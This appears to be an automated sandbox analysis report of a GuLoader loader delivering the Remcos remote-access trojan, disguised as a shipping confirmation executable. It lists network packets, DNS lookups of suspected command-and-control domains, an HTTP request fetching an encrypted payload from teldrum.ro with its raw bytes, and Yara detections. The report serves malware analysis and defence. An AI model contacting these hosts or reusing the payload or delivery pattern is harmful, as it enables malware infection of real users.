                                                                          Jan 16, 2025 05:10:54.667871952 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.667871952 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.667902946 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.667957067 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.668034077 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.668113947 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.668546915 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.668620110 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.669110060 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.669178009 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.669692039 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.669764996 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.670032024 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.670104027 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.670615911 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.670686007 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.671257019 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.671329975 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.671380043 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.671444893 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.672336102 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.672409058 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.672436953 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.672502041 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.673135996 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.673207045 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.754364014 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.754465103 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.754708052 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.754709005 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.754739046 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.754791975 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.785681963 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.785768032 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.785864115 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.785942078 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.786484957 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.786571980 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.787131071 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.787215948 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.787281990 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.787355900 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.787869930 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.787950039 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.788572073 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.788647890 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.788681030 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.788748026 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.789333105 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.789402008 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.790577888 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.790641069 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.790839911 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.790908098 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.791430950 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.791498899 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.791790962 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.791876078 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.792037010 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.792104959 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.792395115 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.792465925 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.840620041 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.840713024 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.840838909 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.840915918 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.872313023 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.872391939 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.872946024 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.873009920 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.873074055 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.873136997 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.873204947 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.873260975 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.873656988 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.873723030 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.873749971 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.873811007 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.874181032 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.874254942 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.874510050 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.874571085 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.874667883 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.874728918 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.875530005 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.875600100 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.875619888 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.875684977 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.876077890 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.876146078 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.903824091 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.903908968 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.904139042 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.904217958 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.904730082 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.904809952 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927458048 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.927618980 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.927755117 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.927783966 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927783966 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927815914 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.927841902 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927845955 CET44349737109.99.162.14192.168.2.4
                                                                          Jan 16, 2025 05:10:54.927851915 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927897930 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927985907 CET49737443192.168.2.4109.99.162.14
                                                                          Jan 16, 2025 05:10:54.927999020 CET44349737109.99.162.14192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 16, 2025 05:10:52.885962009 CET5145853192.168.2.41.1.1.1
                                                                          Jan 16, 2025 05:10:52.962611914 CET53514581.1.1.1192.168.2.4
                                                                          Jan 16, 2025 05:10:56.883433104 CET5703053192.168.2.41.1.1.1
                                                                          Jan 16, 2025 05:10:56.892093897 CET53570301.1.1.1192.168.2.4
                                                                          Jan 16, 2025 05:10:56.894604921 CET6411453192.168.2.41.1.1.1
                                                                          Jan 16, 2025 05:10:56.902887106 CET53641141.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 16, 2025 05:10:52.885962009 CET192.168.2.41.1.1.10x1aa9Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                          Jan 16, 2025 05:10:56.883433104 CET192.168.2.41.1.1.10xc62eStandard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                          Jan 16, 2025 05:10:56.894604921 CET192.168.2.41.1.1.10x6be3Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 16, 2025 05:10:52.962611914 CET1.1.1.1192.168.2.40x1aa9No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                          Jan 16, 2025 05:10:56.892093897 CET1.1.1.1192.168.2.40xc62eNo error (0)linktreewealth.zapto.org0.0.0.0A (IP address)IN (0x0001)false
                                                                          Jan 16, 2025 05:10:56.902887106 CET1.1.1.1192.168.2.40x6be3No error (0)linktreewealthy.zapto.org0.0.0.0A (IP address)IN (0x0001)false
                                                                          • teldrum.ro
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449737109.99.162.144437700C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-16 04:10:54 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: teldrum.ro
                                                                          Cache-Control: no-cache
                                                                          2025-01-16 04:10:54 UTC223INHTTP/1.1 200 OK
                                                                          Date: Thu, 16 Jan 2025 04:10:54 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 493632
                                                                          Connection: close
                                                                          Content-Type: application/octet-stream
                                                                          2025-01-16 04:10:54 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                                          Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                                          Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                                          Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
                                                                          Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                                          Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                                          Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                                          Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                                          Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                                          Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                                          2025-01-16 04:10:54 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                                          Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:23:10:03
                                                                          Start date:15/01/2025
                                                                          Path:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
                                                                          Imagebase:0x400000
                                                                          File size:610'289 bytes
                                                                          MD5 hash:DD009056ED546D7CB3B75EF74F748CED
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2125848795.000000000316C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:23:10:42
                                                                          Start date:15/01/2025
                                                                          Path:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
                                                                          Imagebase:0x400000
                                                                          File size:610'289 bytes
                                                                          MD5 hash:DD009056ED546D7CB3B75EF74F748CED
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
